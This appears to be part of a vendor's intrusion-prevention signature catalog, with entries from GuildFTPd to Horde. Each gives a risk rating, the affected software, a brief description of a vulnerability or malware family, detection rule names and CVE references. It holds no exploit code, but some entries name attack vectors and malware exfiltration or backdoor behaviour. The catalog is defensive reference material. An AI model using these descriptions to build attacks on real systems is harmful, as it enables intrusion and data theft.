GuildFTPd-Remote-Buffer-Overflow

About this vulnerability: A GuildFTPd Remote Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-730-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: GuildFTPd
Type: Buffer Overflow
Description: A buffer overflow vulnerability in GuildFTPd, version 0.999.14, which allows remote attackers to cause a denial of service condition or execute arbitrary code via long arguments to the CWD and LIST commands, which triggers a heap corruption.
Situation: FTP_CS-GuildFTPd-Remote-Buffer-Overflow
References:
CVE-2008-4572
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4572
OSVDB-49045
http://www.osvdb.org/49045
Back to top

GuLoader-Malware-Infection-Traffic

About this vulnerability: GuLoader malware infection traffic detected
Risk: High
First detected in: sgpkg-ips-1271-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: GuLoader malware infection traffic was detected.
Situation: HTTP_CS-GuLoader-Malware-Infection-Traffic
Back to top

Gumblar-Bot

About this vulnerability: Gumblar bot
Risk: High
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Gumblar bot is a Windows malware that can be remotely controller.
Situation: HTTP_CS-Gumblar-Bot-Traffic
HTTP_CRL-Gumblar-Bot-Traffic
File-Text_Gumblar-Bot-Traffic
Back to top

Gzip-Compressed-File

About this vulnerability: gzip archive
Risk: Low
First detected in: sgpkg-ips-186-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: gzip
Type: Insecure Configuration
Description: gzip is a widely used file compression format. These compressed files may be used to import executable content into the target system.
Situation: E-Mail_BS-Gzip-Compressed-File-Transfer
HTTP_SS-Gzip-Compressed-File-Download
File-Binary_Gzip-Compressed-File-With-Reserved-Flag-Bit-Set
File-Binary_Gzip-Compressed-File-With-Invalid-CRC
File-Binary_Gzip-Compressed-File-Upload
File-Binary_Gzip-Compressed-File-Download
Back to top

H0lyGh0st-Ransomware-C2-Traffic

About this vulnerability: H0lyGh0st ransomware command and control traffic
Risk: High
First detected in: sgpkg-ips-1486-5242
Last changed: sgpkg-ips-1486-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: H0lyGh0st is a ransomware with data exfiltration and encryption capabilities.
Situation: HTTP_CRL-H0lyGh0st-Ransomware-C2-Traffic
Back to top

H2-Database-Console-Jdbcutils-JNDI-Injection

About this vulnerability: A vulnerability in H2 Database Project H2 Database
Risk: Moderate
First detected in: sgpkg-ips-1429-5242
Last changed: sgpkg-ips-1429-5242
Platform: Generic
Software: H2 Database
Type: Malfunction
Description: Improper handling of JNDI data source names in requests causes a JNDI injection vulnerability in the H2 database. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-H2-Database-Console-Jdbcutils-JNDI-Injection
References:
CVE-2021-42392
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42392
Back to top

H2-Database-JDBC-URL-Arbitrary-Code-Execution

About this vulnerability: A vulnerability in H2 Database Project H2 Database
Risk: Moderate
First detected in: sgpkg-ips-1437-5242
Last changed: sgpkg-ips-1437-5242
Platform: Generic
Software: H2 Database
Type: Input Validation
Description: Improper input validation when handling a specific JDBC URL causes a vulnerability in the H2 database. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-H2-Database-JDBC-URL-Arbitrary-Code-Execution
References:
CVE-2022-23221
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23221
Back to top

H2-Web-Interface-Create-Alias-RCE

About this vulnerability: An attempt to exploit a vulnerability in H2 Database detected
Risk: High
First detected in: sgpkg-ips-1725-5242
Last changed: sgpkg-ips-1725-5242
Platform: Linux
Software: H2 Database
Type: Input Validation
Description: A vulnerability in H2 Database, versions 2.1.214, 2.0.204, and 1.4.199, which allows remote attackers to execute read and write operations on the database, due to insufficient input validation of H2 SQL commands.
Situation: HTTP_CRL-H2-Web-Interface-Create-Alias-RCE
Back to top

Hadooken-Malware-Activity

About this vulnerability: Hadooken malware activity detected
Risk: High
First detected in: sgpkg-ips-1780-5242
Last changed: sgpkg-ips-1780-5242
Platform: Generic
Software: Hadooken Malware
Type: Backdoor
Description: Hadooken is a Linux malware targetting Weblogic servers. This fingerprint detects the malware's activities.
Situation: HTTP_CSU-Hadooken-Malware-Activity
Back to top

Haihaisoft-Universal-Player-Stack-Based-Buffer-Overflow

About this vulnerability: An attempt to exploit a vulnerability in Haihaisoft Universal Player detected
Risk: High
First detected in: sgpkg-ips-1774-5242
Last changed: sgpkg-ips-1774-5242
Platform: Windows; Mac OS; Android
Software: Haihaisoft
Type: Input Validation
Description: A buffer overflow vulnerability in Haihaisoft Universal Player, versions 1.4.8.0 and possibly others, which allows remote attackers to execute arbitrary code using the ActiveX control, due to the insufficient boundary checks on user-supplied data.
Situation: File-Text_Haihaisoft-Universal-Player-Stack-Based-Buffer-Overflow
References:
CVE-2009-4219
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4219
Back to top

Hak5-WiFi-Pineapple-Preconfiguration-Command-Injection

About this vulnerability: An attempt to exploit a Hak5 WiFi Pineapple Preconfiguration Command Injection vulnerability detected
Risk: High
First detected in: sgpkg-ips-975-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Hak5
Type: Input Validation
Description: A vulnerability in the Hak5 WiFi Pineapple, firmware versions 2.3.0 and before, which allows remote attackers to bypass authentication and execute arbitrary commands due to predictable anti-CSRF tokens.
Situation: HTTP_CRL-Hak5-WiFi-Pineapple-Preconfiguration-Command-Injection
References:
CVE-2015-4624
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4624
Back to top

Ham-Backdoor

About this vulnerability: Ham Backdoor
Risk: High
First detected in: sgpkg-ips-859-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Backdoor
Description: Ham backdoor is mainly used to download additional malware on the system.
Situation: HTTP_CRL-Ham-Backdoor-Request
Back to top

Hamachi-VPN-Usage

About this vulnerability: Hamachi VPN usage
Risk: Moderate
First detected in: sgpkg-ips-214-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Hamachi
Type: Insecure Configuration
Description: Hamachi is a zero-configuration virtual private network solution capable of establishing direct connections between computers that are behind NAT firewalls.
Situation: Shared_TCP-CS-Hamachi-VPN-Logon
Back to top

Hamweq-Bot

About this vulnerability: Hamweq Bot
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Hamweq is a bot that opens a backdoor on the infected machine for a remote attacker to use.
Situation: Generic_CS-Hamweq-Bot-Traffic
Back to top

Hancitor-C2-Traffic

About this vulnerability: Hancitor C2 traffic was detected
Risk: High
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Hancitor is a downloader trojan. It's usually spread via email attachments.
Situation: HTTP_CRL-Hancitor-C2-Traffic
Back to top

Haproxy-Client-And-Server-Cookie-Parsing-Denial-Of-Service

About this vulnerability: A vulnerability in HAProxy HAProxy
Risk: Moderate
First detected in: sgpkg-ips-1180-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HAProxy
Type: Infinite Loop
Description: Incorrect handling of Cookie/Set-Cookie header values in HAproxy causes a denial of service vulnerability which an attacker can exploit to trigger an infinite loop.
Situation: HTTP_CSH-Haproxy-Client-And-Server-Cookie-Parsing-Denial-Of-Service
References:
CVE-2019-14241
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14241
Back to top

Haproxy-Empty-Header-Name-Access-Control-Bypass

About this vulnerability: A vulnerability in HAProxy
Risk: High
First detected in: sgpkg-ips-1571-5242
Last changed: sgpkg-ips-1571-5242
Platform: Generic
Software: HAProxy
Type: Input Validation
Description: An access control bypass vulnerability has been reported in HAProxy. The vulnerability is due to improper parsing of incoming HTTP requests with empty header names. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in access control bypass in HAProxy and, in the worst case, could potentially lead to HTTP request smuggling issues.
Situation: HTTP_CSH-Haproxy-Empty-Header-Name-Access-Control-Bypass
References:
CVE-2023-25725
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25725
Back to top

Haproxy-HTTP-Header-Handling-Integer-Overflow-Vulnerability

About this vulnerability: A vulnerability in HAProxy.
Risk: High
First detected in: sgpkg-ips-1391-5242
Last changed: sgpkg-ips-1391-5242
Platform: Linux; Unix
Software: HAProxy
Type: Integer Overflow
Description: A vulnerability in HAProxy, multiple versions, that allows remote attackers to perform smuggling attacks by sending requests with crafted HTTP headers to a vulnerable server, due to improper checking of HTTP header names.
Situation: HTTP_CSH-Haproxy-HTTP-Header-Handling-Integer-Overflow-Vulnerability
References:
CVE-2021-40346
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40346
Back to top

Haproxy-HTTP2-HPACK-Out-of-Bound-Write

About this vulnerability: A vulnerability in HAProxy
Risk: High
First detected in: sgpkg-ips-1288-5242
Last changed: sgpkg-ips-1341-5242
Platform: Linux
Software: HAProxy
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in HAProxy, versions 1.8 through 2.x before 2.1.4, which allows remote attackers to execute arbitrary code by sending an HTTP2 request with crafted HPACK data, due to the improper checking of total lengths in hpack_dht_insert in hpack-tbl.c.
Situation: HTTP_CS-Haproxy-HTTP2-HPACK-Out-of-Bound-Write
HTTP2_HPACK-Haproxy-HTTP2-HPACK-Out-of-Bound-Write
References:
CVE-2020-11100
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11100
Back to top

Harbor-Project-Harbor-User-API-Privilege-Escalation

About this vulnerability: A vulnerability in Harbor
Risk: Moderate
First detected in: sgpkg-ips-1194-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Harbor
Type: Input Validation
Description: An API request with a crafted payload can be used to exploit a privilege escalation vulnerability in Harbor. A successful exploit will grant the attacker administrator privileges on the service.
Situation: File-Text_Harbor-Project-Harbor-User-API-Privilege-Escalation
References:
CVE-2019-16097
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16097
Back to top

Harbour-Networks-Routers-Information-Disclosure

About this vulnerability: A vulnerability in Harbour Networks routers
Risk: High
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Harbour Networks routers
Type: Malfunction
Description: There is an information disclosure vulnerability in some Harbour Networks routers.
Situation: HTTP_CSU-Harbour-Networks-Routers-Information-Disclosure
Back to top

Harnig

About this vulnerability: Harnig
Risk: High
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Harnig is a Botnet that is used to install additional malware on the infected machines.
Situation: HTTP_CSU-Harnig-Activity-Detected
Back to top

Hashicorp-Consul-Remote-Command-Execution

About this vulnerability: A vulnerability in Hashicorp Consul
Risk: High
First detected in: sgpkg-ips-1174-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Hashicorp Consul
Type: Input Validation
Description: A vulnerability in Hashicorp Consul which allows remote attackers to execute arbitrary commands on Consul nodes, via the services API, due to insufficient input validation.
Situation: HTTP_CSR-Hashicorp-Consul-Remote-Command-Execution
Back to top

Hashicorp-Consul-Rexec-RCE

About this vulnerability: A vulnerability in Hashicorp Consul
Risk: High
First detected in: sgpkg-ips-1197-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Hashicorp Consul
Type: Input Validation
Description: A vulnerability in Hashicorp Consul which allows remote attackers to execute arbitrary code through the remote code execution function _rexec.
Situation: HTTP_CRL-Hashicorp-Consul-Rexec-RCE
Back to top

Hashicorp-Nomad-Remote-Command-Execution

About this vulnerability: A vulnerability in HashiCorp Nomad.
Risk: High
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1368-5242
Platform: Linux; Windows
Software: HashiCorp Nomad
Type: Insecure Configuration
Description: A vulnerability in HashiCorp Nomad which allows remote attackers to spawn a shell by creating batch jobs and execute arbitrary code with the raw_exec driver which is on in the default configuration.
Situation: HTTP_CS-Hashicorp-Nomad-Remote-Command-Execution
Back to top

Hastymail-Remote-Command-Execution

About this vulnerability: A Hastymail Remote Command Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Hastymail
Type: Input Validation
Description: A vulnerability in Hastymail, versions 2.1.1 before RC2, which allows remote attackers to execute arbitrary commands via the rs or rsargs[] parameters in a mailbox Drafts action.
Situation: HTTP_CRL-Hastymail-Remote-Command-Execution
References:
CVE-2011-4542
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4542
BID-50791
http://www.securityfocus.com/bid/50791
OSVDB-77331
http://www.osvdb.org/77331
Back to top

Hauri-AntiVirus-ACE-Archive-Handling-Buffer-Overflow

About this vulnerability: A vulnerability in HAURI AntiVirus
Risk: High
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HAURI Antivirus
Type: Malfunction
Description: A buffer overflow vulnerability exists in HAURI Anti-Virus products. The flaw exists in the scanning of ACE archives containing compressed files with overly long names. A malicious user may exploit this vulnerability to bypass virus scanning, or execute arbitrary code on the affected system. In a simple attack case aimed at evading virus detection, the vulnerable program reports no detected viruses in the crafted ACE archive. In a more sophisticated attack scenario, where the malicious user is successful in injecting and executing supplied code, the behaviour of the system is dependent on the nature of the injected code. Any code injected into the vulnerable component will execute in the security context of the current logged on user.
Situation: File-Binary_AntiVirus-ACE-File-Handling-Buffer-Overflow
File-Binary_AntiVirus-ACE-File-Handling-Buffer-Overflow-2
References:
CVE-2005-2720
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2720
BID-14647
http://www.securityfocus.com/bid/14647
Back to top

Header-Integer-Percent-Encoding

About this vulnerability: Percent encoded value in HTTP headers
Risk: Low
First detected in: sgpkg-ips-684-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Vulnerability Scanner
Description: Percent encoded integers in header fields are rare in normal HTTP traffic. This may indicate a logic injection attempt.
Situation: HTTP_CSH-Header-Integer-Percent-Encoding
Back to top

Headline-Portal-Engine-Php-Remote-File-Inclusion

About this vulnerability: A vulnerability in Headline Portal Engine
Risk: High
First detected in: sgpkg-ips-155-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Headline Portal Engine
Type: Code Injection
Description: There is a vulnerability in Headline Portal Engine that allows inclusion of arbitrary files, leading to code injection and execution in the context of the web server.
Situation: HTTP_CSU-Headline-Portal-Engine-Php-Remote-File-Inclusion
References:
BID-19633
http://www.securityfocus.com/bid/19633
Back to top

Heap-Based-Buffer-Overflow-Vulnerability-In-Smb-Kernel-Server-Ksmbd-ZDI-22-1688

About this vulnerability: An attempt to exploit a vulnerability in ksmbd detected
Risk: High
First detected in: sgpkg-ips-1544-5242
Last changed: sgpkg-ips-1544-5242
Platform: Linux
Software: ksmbd
Type: Heap Overflow
Description: The flaw exists within the handling of file attributes in SMB kernel server ksmbd. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the kernel.
Situation: SMB-TCP_CHS_Heap-Based-Buffer-Overflow-Vulnerability-In-Smb-Kernel-Server-Ksmbd-ZDI-22-1688
References:
CVE-2022-47942
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-47942
Back to top

Heimdal-KDC-ASN1-der-Length-Denial-Of-Service

About this vulnerability: A vulnerability in h5l.org Heimdal
Risk: Moderate
First detected in: sgpkg-ips-1077-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Heimdal
Type: Malfunction
Description: There exists a denial-of-service vulnerability in Heimdal, a Kerberos implementation. A remote, unauthenticated attacker can use this to cause the process to crash.
Situation: Generic_UDP-Heimdal-KDC-ASN1-der-Length-Denial-Of-Service
References:
CVE-2017-17439
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17439
Back to top

Heloag

About this vulnerability: Heloag
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Heloag is a Botnet. It communicates with it's botmaster and peers through P2P.
Situation: HTTP_CSU-Heloag-Activity
Back to top

Herpsnet-Bot

About this vulnerability: HerpsNet Bot
Risk: High
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: HerpsNet is a Botnet that is used for various malicious purposes.
Situation: HTTP_CSH-Herpsnet-Bot-Traffic
Back to top

Hewlett-Packard-Enterprise-Vertica-Validateadminconfig-Remote-Command-Injection

About this vulnerability: A vulnerability in HPE Vertica
Risk: High
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: HP Enterprise Vertica
Type: Input Validation
Description: There exists a remote command injection vulnerability in Hewlett Packard Enterprise Vertica. A remote attacker could use this to execute arbitrary commands on the system with root priviliges.
Situation: HTTP_CRL-Hewlett-Packard-Enterprise-Vertica-Validateadminconfig-Remote-Command-Injection
References:
CVE-2016-2002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2002
Back to top

Hexojs-Hexo-Includecodetag-Path-Traversal

About this vulnerability: A vulnerability in Hexojs Hexo
Risk: Moderate
First detected in: sgpkg-ips-1644-5242
Last changed: sgpkg-ips-1644-5242
Platform: Generic
Software: Hexo
Type: Directory Traversal
Description: A path traversal vulnerability has been reported for Hexojs Hexo. The vulnerability is due to insufficient restriction of the path in the include_code tag plugin. A remote attacker could exploit this vulnerability by enticing the victim to add a specially crafted Markdown file to their Hexo website. Successful exploitation could result in sensitive information disclosure.
Situation: File-Text_Hexojs-Hexo-Includecodetag-Path-Traversal
References:
CVE-2023-39584
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39584
Back to top

HiatusRAT-Malware-C2-Traffic

About this vulnerability: HiatusRAT malware activity detected
Risk: High
First detected in: sgpkg-ips-1815-5242
Last changed: sgpkg-ips-1815-5242
Platform: Linux
Software: HiatusRAT
Type: Backdoor
Description: Hiatus is a remote access trojan (RAT) that targets Linux systems and business-grade routers. The malware can collect system level details, including MAC addresses, kernel version, firmware version, running processes and more. The malware sends HTTP POST requests to the attacker to track the status of each compromised router. This fingerprint detects such tracking requests.
Situation: HTTP_CSU-HiatusRAT-Malware-C2-Traffic
Back to top

HIDDEN-COBRA

About this vulnerability: Traffic pattern associated with HIDDEN COBRA
Risk: High
First detected in: sgpkg-ips-1028-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: This vulnerability refers to a number of situations that detect traffic patterns associated with HIDDEN COBRA. HIDDEN COBRA is the U.S Government assignated name for malicious cyber activity by North Korean government.
Situation: HTTP_CS-HIDDEN-COBRA-Beacon-COPPERHEDGE
HTTPS_CS-Suspected-HIDDEN-COBRA-Malicious-SSL-Traffic
File-Exe_HIDDEN-COBRA-Executable-PEBBLEDASH
File-Exe_HIDDEN-COBRA-Executable-TAINTEDSCRIBE
File-Exe_HIDDEN-COBRA-Executable-COPPERHEDGE
Back to top

Hiddentear-Worm-Infection-Traffic

About this vulnerability: Hiddentear worm infection traffic was detected
Risk: High
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Hiddentear worm infection traffic was detected.
Situation: Generic_CS-Hiddentear-Worm-Infection-Traffic
Back to top

Hikvision-Command-Injection-CVE-2021-36260

About this vulnerability: An attempt to exploit a vulnerability in Hikvision detected
Risk: High
First detected in: sgpkg-ips-1412-5242
Last changed: sgpkg-ips-1443-5242
Platform: Generic
Software: Hikvision
Type: Input Validation
Description: A command injection vulnerability has been reported in the web server component of multiple Hikvision products.
Situation: File-Text_Hikvision-Command-Injection-CVE-2021-36260
File-TextId_Hikvision-Command-Injection-CVE-2021-36260
References:
CVE-2021-36260
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36260
Back to top

Hikvision-DVR-Buffer-Overflow

About this vulnerability: A Hikvision DVR Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-698-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Hikvision DVR
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Hikvision DVR, firmware version 2.2.10 build 131009, which allows remote attackers to execute arbitrary code with a long Authorization header via an RTSP PLAY request.
Situation: Generic_CS-Hikvision-DVR-Buffer-Overflow
References:
CVE-2014-4880
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4880
Back to top

Hikvision-IP-Camera-Unauthenticated-Password-Change

About this vulnerability: A vulnerability in Hikvision IP Cameras.
Risk: High
First detected in: sgpkg-ips-1508-5242
Last changed: sgpkg-ips-1508-5242
Platform: Generic
Software: Hikvision
Type: Malfunction
Description: A vulnerability in Hikvision IP cameras, multiple verions, that allow remote attackers to gain full access to the target device, due to improper authentication logic which allows unauthenticated impersonation of any configured user account.
Situation: HTTP_CSU-Hikvision-IP-Camera-Unauthenticated-Password-Change
References:
CVE-2017-7921
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7921
Back to top

Hiloti

About this vulnerability: Hiloti
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Hiloti is a bot that downloads other malware on the infected machine.
Situation: HTTP_CSU-Hiloti-Activity
Back to top

HNS-Botnet-C2-Traffic

About this vulnerability: Hide and Seek botnet C2 traffic was detected
Risk: High
First detected in: sgpkg-ips-1173-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: <os>
Type: Backdoor
Description: Hide and Seek is a peer-to-peer botnet targeting IOT devices.
Situation: Generic_UDP-HNS-Botnet-C2-Traffic
Back to top

Home-Router-UPnP-Flash-Vulnerability

About this vulnerability: Home Router UPnP Flash Vulnerability
Risk: Low
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: UPnP
Type: Malfunction
Description: A vulnerability exists in UPnP.
Situation: HTTP_CSH-Home-Router-UPnP-Flash-Vulnerability
Back to top

HomeMatic-CCU2-RCE

About this vulnerability: A vulnerability in HomeMatic CCU2
Risk: High
First detected in: sgpkg-ips-1322-5242
Last changed: sgpkg-ips-1322-5242
Platform: Generic
Software: HomeMatic
Type: Insecure Configuration
Description: There exists a vulnerability in HomeMatic CCU2 home automation systems, versions 2.29.2 and earlier, which allows remote attackers to obtain read and write access and execute system commands.
Situation: HTTP_CRL-HomeMatic-CCU2-RCE
References:
CVE-2018-7297
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7297
Back to top

Honeywell-ActiveX-Control-Code-Execution

About this vulnerability: Honeywell ActiveX control code execution.
Risk: High
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Honeywell RemoteDeploy
Type: Insecure Configuration
Description: An ActiveX control, HscRemoteDeploy.dll, vulnerability in Honeywell RemoteDeploy that allows a remote attacker to run commands on the target client via a crafted HTML document.
Situation: File-Text_Honeywell-ActiveX-Control-Code-Execution
References:
CVE-2013-0108
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0108
Back to top

Honeywell-Multiple-Products-Hscremotedeploy.dll-ActiveX-Control-Code-Execution

About this vulnerability: A vulnerability in Honeywell ComfortPoint Open Manager
Risk: Moderate
First detected in: sgpkg-ips-813-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Honeywell ComfortPoint Open Manager; Honeywell Enterprise Buildings Integrator; Honeywell SymmetrE
Type: Malfunction
Description: There is a code execution vulnerability in Honeywell HscRemoteDeploy.dll ActiveX Control. The vulnerability is due a failure to validate user input that can lead to the execution of an arbitrary HTA application. An attacker can exploit this vulnerability by enticing a user to visit a specially crafted web page. Successful exploitation will result in arbitrary code execution in the context of the affected application.
Situation: File-Text_Honeywell-Multiple-Products-Hscremotedeploy.dll-ActiveX-Control-Code-Execution
References:
CVE-2013-0108
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0108
BID-58134
http://www.securityfocus.com/bid/58134
OSVDB-90583
http://www.osvdb.org/90583
Back to top

Honeywell-Opos-Suite-Hwoposscale.ocx-Open-Method-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Honeywell OPOS Suite
Risk: Moderate
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Honeywell OPOS Suite
Type: Malfunction
Description: A buffer overflow vulnerability has been reported in Honeywell OPOS Suite. The vulnerability is due to improper bounds checking while processing the Open method calls within the HWOPOSScale.ocx ActiveX control. An attacker can exploit this vulnerability by enticing a user to visit a specially crafted web page. This can result in arbitrary code execution in the context of the current logged on user.
Situation: File-Text_Honeywell-Opos-Suite-Hwoposscale.ocx-Open-Method-Stack-Buffer-Overflow
References:
CVE-2014-8269
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8269
OSVDB-115784
http://www.osvdb.org/115784
Back to top

Honeywell-Opos-Suite-Hwoposscanner.ocx-Open-Method-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Honeywell OPOS Suite
Risk: Moderate
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Honeywell OPOS Suite
Type: Malfunction
Description: A buffer overflow vulnerability has been reported in Honeywell OPOS Suite. The vulnerability is due to improper bounds checking while processing the Open method calls within the HWOPOSSCANNER.ocx ActiveX control. An attacker can exploit this vulnerability by enticing a user to visit a specially crafted web page. This can result in arbitrary code execution in the context of the current logged on user.
Situation: File-Text_Honeywell-Opos-Suite-Hwoposscanner.ocx-Open-Method-Stack-Buffer-Overflow
References:
CVE-2014-8269
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8269
OSVDB-115785
http://www.osvdb.org/115785
Back to top

Honeywell-UniSim-ShadowPlant-Bridge-DoS

About this vulnerability: A vulnerability in Honeywell UniSim ShadowPlant Bridge
Risk: Moderate
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Honeywell UniSim
Type: Malfunction
Description: There is a denial of service vulnerability in Honeywell UniSim ShadowPlant Bridge
Situation: Generic_CS-Honeywell-UniSim-ShadowPlant-Bridge-DoS
Back to top

Hongtoutou-Adrd-Bot

About this vulnerability: HongTouTou-ADRD Bot
Risk: High
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: HongTouTou
Type: Code Injection
Description: HongTouTou, also known as Android/Drad.A, is Trojan that targets Android devices. It accepts commands from and sends sensitive information to an external server.
Situation: HTTP_CSH-Hongtoutou-Adrd-Bot-Traffic-Detected
Back to top

Horde-Backdoor-Code-Execution

About this vulnerability: A Horde Backdoor Code Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-710-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Horde
Type: Backdoor
Description: An externally introduced backdoor in Horde 3.3.12, Horde Groupware 1.2.10, and Horde Groupware Webmail Edition 1.2.10, placed in the distributions between November 2011 to February 2012, in templates/javascript/open_calendar.js, which allows remote attackers to execute arbitrary PHP code.
Situation: HTTP_CRL-Horde-Backdoor-Code-Execution
References:
CVE-2012-0209
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0209
OSVDB-79246
http://www.osvdb.org/79246
Back to top

Horde-CSV-Import-Arbitrary-PHP-Code-Execution

About this vulnerability: A vulnerability in Horde
Risk: High
First detected in: sgpkg-ips-1237-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Horde
Type: PHP Injection
Description: There exists a vulnerability in Horde, versions 2.1.4 and before, which allows remote attackers to execute arbitrary PHP code by uploading a malicious CSV file, due to the lack of proper character escaping.
Situation: HTTP_CRL-Horde-CSV-Import-Arbitrary-PHP-Code-Execution
References:
CVE-2020-8518
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8518
Back to top

Horde-Groupware-Webmail-Edition-Ingo-Filter-Cross-Site-Request-Forgery

About this vulnerability: A vulnerability in Horde Project Groupware Webmail Edition
Risk: High
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Horde Groupware Webmail Edition
Type: Input Validation
Description: A Cross-Site Request Forgery (CSRF) vulnerability exists in Horde Groupware Webmail Edition. The vulnerabilities are due to insufficient Cross-Site Request Forgery protections. An attacker could exploit this vulnerability by convincing the user to follow a malicious link or visit an attacker-controlled website. A successful exploit could allow the attacker to submit arbitrary requests to the affected service via the affected web browser with the privileges of the user.
Situation: HTTP_CS-Horde-Groupware-Webmail-Edition-Ingo-Filter-Cross-Site-Request-Forgery
References:
CVE-2013-6275
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6275
OSVDB-99042
http://www.osvdb.org/99042
Back to top

Horde-Unserialize-PHP-Code-Execution

About this vulnerability: A Horde Unserialize PHP Code Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-699-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Horde
Type: Input Validation
Description: A vulnerability in Horde, versions before 5.1.1, which allow remote attackers to eecute arbitrary PHP code via a crafted serialized object in the _formvars form.
Situation: HTTP_CRL_Horde-Unserialize-PHP-Code-Execution
References:
CVE-2014-1691
